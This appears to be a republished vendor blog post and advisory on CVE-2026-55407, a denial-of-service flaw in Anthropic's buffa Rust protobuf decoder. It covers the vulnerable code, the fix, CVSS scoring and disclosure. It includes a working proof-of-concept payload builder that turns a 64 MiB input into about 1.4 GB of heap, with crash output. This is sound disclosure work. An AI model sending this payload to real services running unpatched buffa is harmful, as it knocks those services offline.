{"slug": "22x-memory-amp-dos-in-anthropic-s-buffa-protobuf-decoder-cve-2026-55407", "title": "22x memory amp DoS in Anthropic's buffa protobuf decoder (CVE-2026-55407)", "summary": "Anthropic's Rust protobuf library buffa contains a denial-of-service vulnerability (CVE-2026-55407) that allows attackers to trigger excessive memory allocation, up to 22x the input size, via an unknown-field decoder. Endor Labs' AI SAST engine identified the flaw, which affects all messages decoded with `preserve_unknown_fields=true`. Anthropic has acknowledged the issue and is collaborating on a fix.", "body_md": "When I pointed Endor Labs' AI SAST engine at [buffa](https://github.com/anthropics/buffa), Anthropic's Rust protobuf library, it flagged a vulnerable data flow I would not have prioritized from a quick read: an unknown-field decoder that allocates heap in proportion to attacker-controlled wire data. The engine called it a potential denial of service via excessive memory allocation. The proportional allocation the engine pointed at is real but modest, roughly 2x the input. Following the same function one branch further led to a second sink that amplifies a tiny input into a heap blow-up of about 22x, which is enough to OOM-kill a process whose memory cap sits well above any sane input-size limit.\n\nbuffa ships from Anthropic, the same lab that builds frontier models, including the recently released and un-released Mythos and Fable models, so it is about as close to model-assisted, heavily reviewed Rust as you will find. This flaw in the data flow still shipped, and was caught by our AI SAST security engine, following it end to end. The Anthropic team quickly responded to the disclosure and engaged in productive collaborative discourse on severity depending on deployment.\n\nThis is a good example of [Endor Labs AI SAST](https://www.endorlabs.com/learn/ai-sast-benchmark-2x-more-real-vulnerabilities) earning its keep on a memory-safe language. The bug is an allocation-budget flaw on a forward-compatibility code path that every buffa-decoded message routes untrusted input through, and the engine found it by following data, not by pattern-matching a dangerous call.\n\n## Affected component\n\nTracked as [GHSA-f9qc-qg88-7pq5](https://github.com/anthropics/buffa/security/advisories/GHSA-f9qc-qg88-7pq5) / CVE-2026-55407, Moderate (CVSS 4.0 6.3). Any message decoded from untrusted input using code generated with `preserve_unknown_fields=true`\n\n(the default) was affected.\n\nThe vulnerable code is` decode_unknown_field in buffa/src/encoding.rs.`\n\n## How AI SAST identified it\n\nThe engine traced a length value parsed from wire data straight into a Vec<u8> allocation, with no bound between the two beyond fitting in a usize. It reported the flow stage by stage.\n\n**AI SAST output:**\n\n```\n{\n\n  \"ruleId\": \"AI SAST: Potential Denial of Service via excessive memory allocation due to large LengthDelimited field\",\n\n  \"level\": \"note\",\n\n  \"message\": \"decode_unknown_field allocates a Vec<u8> whose length is taken directly\n\n    from a length prefix (len) parsed from the input for WireType::LengthDelimited fields.\n\n    There is no upper bound on len beyond fitting into usize and the size of the provided\n\n    buffer. A caller can supply an arbitrarily large buffer whose contents specify an\n\n    arbitrarily large len, causing this function to attempt a very large allocation and\n\n    potentially exhaust memory, resulting in a denial of service.\",\n\n  \"locations\": [{ \"physicalLocation\": {\n\n    \"artifactLocation\": { \"uri\": \"buffa/src/encoding.rs\" },\n\n    \"region\": { \"startLine\": 496 }\n\n  }}]\n\n}\n```\n\n**Identified data flow:**\n\nThis is the part of AI SAST I have come to rely on. The engine did not just see a vec! and shrug. It established that len originates in untrusted input, that the only check between source and sink bounds the buffer rather than the allocation, and that the function is reachable from the default decode APIs. That is a real source-to-sink data flow on a memory-safe target, and it is the thread I pulled to amplify the second vector.\n\n## The flagged sink: unbounded flat allocation\n\nThe engine pointed at the `LengthDelimited`\n\narm of `decode_unknown_field`\n\n. Here it is verbatim, from `vendor/buffa/src/encoding.rs lines 490 through 499`\n\n:\n\n``` js\nWireType::LengthDelimited => {\n\n    let len = decode_varint(buf)?;\n\n    let len = usize::try_from(len).map_err(|_| DecodeError::MessageTooLarge)?;\n\n    if buf.remaining() < len {\n\n        return Err(DecodeError::UnexpectedEof);\n\n    }\n\n    let mut data = alloc::vec![0u8; len];   // attacker-sized allocation\n\n    buf.copy_to_slice(&mut data);\n\n    UnknownFieldData::LengthDelimited(data)\n\n}\n```\n\n`len`\n\ncomes off the wire and is used directly as the allocation size. The `buf.remaining() < len`\n\nguard prevents an out-of-bounds read, but it does not cap the allocation. It only forces the attacker to actually deliver `len `\n\nbytes. The function's own docstring acknowledges this and pushes the mitigation onto callers, at lines 463 through 468:\n\nThat guidance is the load-bearing assumption I ended up disproving. It holds for this flat sink, where a caller-side input-size cap really does bound the allocation at about 2x. It does not hold one branch down.\n\n## Following the flow further: ~22x amplification in the StartGroup arm\n\nThe same function handles `StartGroup`\n\nunknown fields, and that arm reads nested fields in a loop until it sees the matching `EndGroup`\n\n. From lines 500 through 520:\n\n``` js\nWireType::StartGroup => {\n\n    let depth = depth\n\n        .checked_sub(1)\n\n        .ok_or(DecodeError::RecursionLimitExceeded)?;   // bounds recursion DEPTH\n\n    let group_field_number = tag.field_number();\n\n    let mut nested = UnknownFields::new();\n\n    loop {\n\n        let nested_tag = Tag::decode(buf)?;\n\n        if nested_tag.wire_type() == WireType::EndGroup {\n\n            if nested_tag.field_number() != group_field_number {\n\n                return Err(DecodeError::InvalidEndGroup(nested_tag.field_number()));\n\n            }\n\n            break;\n\n        }\n\n        nested.push(decode_unknown_field(nested_tag, buf, depth)?);  // per-tag UnknownField alloc\n\n    }\n\n    UnknownFieldData::Group(nested)\n\n}\n```\n\nThe `checked_sub`\n\nbounds recursion depth, which stops a nested-group stack attack. It does nothing about field count inside a single group. Every loop iteration pushes an `UnknownField`\n\ninto `nested.fields: Vec<UnknownField>`\n\n. On a 64-bit target an `UnknownField`\n\nis about 40 bytes: a 4-byte field number, 4 bytes of padding, and a 32-byte `UnknownFieldData`\n\nenum sized by its `LengthDelimited(Vec<u8>)`\n\nand Group(UnknownFields) variants.\n\nThe cheapest nested field an attacker can encode is a varint with value zero, which is exactly 2 wire bytes: a 1-byte tag and a 1-byte zero. So each 2 bytes of input produces a roughly 40-byte heap structure. That is a 20x amplification on the structures alone, plus about another 1.5x transient while the backing Vec doubles during growth. A 64 MiB payload of zero varints inside one unknown group drives the decoder to roughly 1.4 GB of heap.\n\nThe wire payload is trivial:\n\nThe receiving message type does not need to declare a group field. Protobuf forward-compatibility routes every unknown wire type through decode_unknown_field, so any concrete buffa-decoded message is exploitable. My POC uses google.protobuf.Empty precisely because it has zero defined fields, which makes the wire-level analysis unambiguous.\n\n## Reachable from the default APIs\n\nThe convenience methods feed this code path with no allocation budget. From `vendor/buffa/src/message.rs `\n\nlines 183 through 190:\n\n``` php\nfn decode_from_slice(mut data: &[u8]) -> Result<Self, DecodeError>\n\nwhere\n\n    Self: Sized,\n\n{\n\n    Self::decode(&mut data)\n\n}\n```\n\n`Message::decode, Message::decode_from_slice`\n\n, and `MessageView::decode_view`\n\nall reach the vulnerable sinks. The explicit DecodeOptions type does cap top-level message length, but the default is` DEFAULT_MAX_MESSAGE_SIZE = 0x7FFF_FFFF`\n\n, roughly 2 GiB, which is far too high to matter, and more importantly it caps input length only. It never sees the group-amplification blow-up, because that vector starts from a small input that expands during decode.\n\n## Validating it: from \"survives\" to OOM-kill\n\nI built a self-contained Cargo workspace with a POC server and attacker, vendoring buffa and buffa-types verbatim so the result is reproducible without any network access. The attacker constructs the group-amplification payload in` build_group_amp`\n\n. The programmatic core is just this:\n\n``` js\nuse buffa::Message;\n\nuse buffa_types::Empty;\n\nlet nested_count = 33_554_431_usize;\n\nlet mut payload: Vec<u8> = Vec::with_capacity(2 * nested_count + 2);\n\npayload.push(0x0b); // StartGroup, field 1\n\nfor _ in 0..nested_count {\n\n    payload.extend_from_slice(&[0x08, 0x00]); // varint tag, value 0\n\n}\n\npayload.push(0x0c); // EndGroup, field 1\n\n// Server side: ~1.4 GB heap from a 64 MiB input. ~22x.\n\nlet _ = Empty::decode_from_slice(&payload);\n\nUnder Docker with the server capped at 256 MiB, the 64 MiB payload OOM-kills it:\n\npoc-server-crash    | [server] reading 67108864 byte payload\n\npoc-server-crash    | [server] payload read; input buffer = 67108864 bytes\n\npoc-server-crash    | [server] calling decode...\n\n[poc-server-crash exited with code 137]\n```\n\nExit 137 with `OOMKilled: true`\n\nconfirms the kill. The measured results separate the two sinks cleanly:\n\n## Why the docstring's advice is not enough\n\nThe mitigation the function delegates to callers, \"limit the input buffer size,\" is exactly the control the amplification vector defeats. A 64 MiB input cap still permits roughly 1.4 GB of allocation. The defensive perimeter has to move from the caller into the decoder. The minimum fix is a per-group nested-field count cap, which bounds worst-case amplification at a few hundred KiB per group:\n\n``` js\nWireType::StartGroup => {\n\n    let depth = depth.checked_sub(1).ok_or(DecodeError::RecursionLimitExceeded)?;\n\n    let group_field_number = tag.field_number();\n\n    let mut nested = UnknownFields::new();\n\n    let mut count = 0usize;\n\n    loop {\n\n        let nested_tag = Tag::decode(buf)?;\n\n        if nested_tag.wire_type() == WireType::EndGroup { /* ... */ break; }\n\n        count += 1;\n\n        if count > MAX_UNKNOWN_FIELDS_PER_MESSAGE {\n\n            return Err(DecodeError::TooManyUnknownFields);\n\n        }\n\n        nested.push(decode_unknown_field(nested_tag, buf, depth)?);\n\n    }\n\n    UnknownFieldData::Group(nested)\n\n}\n```\n\nThe more robust fix is to thread a global allocation budget through `DecodeOptions`\n\nand deduct from it on every heap allocation, both the `LengthDelimited`\n\nbytes and the `UnknownField`\n\nslots, so both vectors and any future amplification path are caught by one control. The convenience methods should then call through `DecodeOptions::default()`\n\nwith a realistic budget (64 MiB matches prost's default) rather than the current 2 GiB. Once those land, the docstring should be corrected, since input-size caps are not a sufficient mitigation for the group vector.\n\n### What shipped\n\nThe fix landed in buffa and connectrpc 0.8.0. It enforces a per-message unknown-field count limit, configurable, defaulting to 1 million unknown fields, which caps allocation overhead at roughly 40 MiB per message. That is the count-cap approach above, applied as a general per-message control rather than only to the group arm. Users who cannot upgrade immediately have a second option: regenerate their code with `preserve_unknown_fields=false`\n\n, which removes the unknown-field retention that feeds the sink entirely.\n\n## Impact: why severity depends on the deployment\n\nThe most interesting part of this finding is that it does not have a single correct severity. The amplification ratio is a fixed property of the code, but whether that ratio translates into a momentary blip or a critical outage depends entirely on how the consuming service is built. I think it is worth laying out that spectrum explicitly, because a reader running buffa needs to score it against their own architecture rather than inherit anyone else's number.\n\nThe two sinks sit at different points on that spectrum to begin with. The flat LengthDelimited sink is roughly 2x and is genuinely bounded by a transport-level input-size cap, so I am comfortable with it sitting around the 6.3 (Medium) that was assigned. A caller who caps input at, say, 4 MiB has bounded the allocation at about 8 MiB, and that is the end of it. The group-amplification sink is the one where severity moves, because the ~22x factor breaks the assumption that an input cap bounds memory.\n\nHere is the same vulnerability across deployment profiles, from least to most severe:\n\nThe nuance I pressed during disclosure is that the two metrics driving the score, attack requirements and availability impact, are both deployment-dependent for the amplification vector, and the favorable reading is not the general case.\n\nOn attack requirements: the justification for treating exploitation as conditional was that it needs the library deployed on an externally-reachable decode path with the input-size limit raised above the default. For the amplification vector specifically, that is the exact condition the bug defeats. The attacker does not need a raised cap; they need cap × 22 > available memory, which holds under common defaults. A 4 MB gRPC limit is already enough. So for that vector I would argue the requirements stay low rather than becoming a meaningful precondition, and that network reachability is already captured once by the attack-vector metric rather than a second time as an added requirement.\n\nOn availability: scoring it as a transient single-worker crash assumes effective rate-limiting on the decode path and automatic recovery that actually recovers. The trigger here is small, unauthenticated, and perfectly repeatable, so a worker that auto-restarts can be driven straight back into another OOM. That is a crash-loop, which reads as sustained unavailability rather than graceful degradation, and the library does not itself provide the rate-limiting that would prevent it.\n\nNone of this is a disagreement that 6.3 is correct for a specific, well-supervised, rate-limited deployment. It is an argument that the same code reaches the High-to-Critical range for the file-ingestion and default-gRPC profiles, and that consumers should score the vector against their own concurrency limits, memory headroom, and recovery behavior. That is also the case for a CVE: a tracked identifier lets each consumer evaluate their own exposure instead of assuming the most favorable deployment.\n\n## Disclosure\n\nI reported both vectors to Anthropic through their bug bounty program, and the experience was genuinely collaborative from start to finish. The team validated the report quickly, confirmed both vectors reproduce as described, and explicitly agreed the group-amplification analysis was correct. When I pushed back on the initial rescore, they did not wave it off. They walked me through exactly which CVSS 4.0 metrics they were using and the deployment assumptions behind each one, which is precisely the kind of transparent, technical back-and-forth that makes coordinated disclosure work well. We did not land in the same place on every metric, but the disagreement was substantive and respectful on both sides, and I came away with a clear understanding of their reasoning.\n\nAnthropic scored the issue against their own deployment profile, multiple supervised replicas with automatic restart, and settled on CVSS 4.0 6.3 (Moderate) with a $600 bounty. They shipped the fix in buffa and connectrpc 0.8.0, requested a CVE, and the issue is now tracked as [GHSA-f9qc-qg88-7pq5](https://github.com/anthropics/buffa/security/advisories/GHSA-f9qc-qg88-7pq5) and CVE-2026-55407. Throughout, the team was responsive, willing to engage on the hard scoring questions, and accommodating on disclosure timing and CVE tracking. It is a good example of a vendor security team treating an external researcher as a partner, and I appreciated working with them on it.\n\n## Takeaway\n\nWhat I want to highlight is the workflow. AI SAST established a true data flow from untrusted wire bytes to an unbounded allocation on a path reachable from the default API, on a memory-safe Rust target where there is no overflow to grep for. That is the hard part of triage. Following that flow one branch further, into the group decoder, is where the 22x amplification lived. The engine put me on the function that mattered, and the rest was validation.\n\nThat it found this in buffa, a library from a frontier-model lab developed by their own models, is its own small comment on the value of analysis built specifically to trace untrusted data to dangerous sinks. One DoS in one library does not prove much on its own. But the path from source to sink was there to be found, and the tool built for that job is the one that found it.\n\n### What's next?\n\nWhen you're ready to take the next step in securing your software supply chain, here are 3 ways Endor Labs can help:", "url": "https://wpnews.pro/news/22x-memory-amp-dos-in-anthropic-s-buffa-protobuf-decoder-cve-2026-55407", "canonical_source": "https://www.endorlabs.com/learn/endor-labs-ai-sast-finds-zero-day-cve-2026-55407-buffa", "published_at": "2026-06-30 22:36:11+00:00", "updated_at": "2026-06-30 22:50:07.302940+00:00", "lang": "en", "topics": ["ai-safety", "ai-tools", "ai-research"], "entities": ["Anthropic", "Endor Labs", "buffa", "CVE-2026-55407", "Mythos", "Fable"], "alternates": {"html": "https://wpnews.pro/news/22x-memory-amp-dos-in-anthropic-s-buffa-protobuf-decoder-cve-2026-55407", "markdown": "https://wpnews.pro/news/22x-memory-amp-dos-in-anthropic-s-buffa-protobuf-decoder-cve-2026-55407.md", "text": "https://wpnews.pro/news/22x-memory-amp-dos-in-anthropic-s-buffa-protobuf-decoder-cve-2026-55407.txt", "jsonld": "https://wpnews.pro/news/22x-memory-amp-dos-in-anthropic-s-buffa-protobuf-decoder-cve-2026-55407.jsonld"}}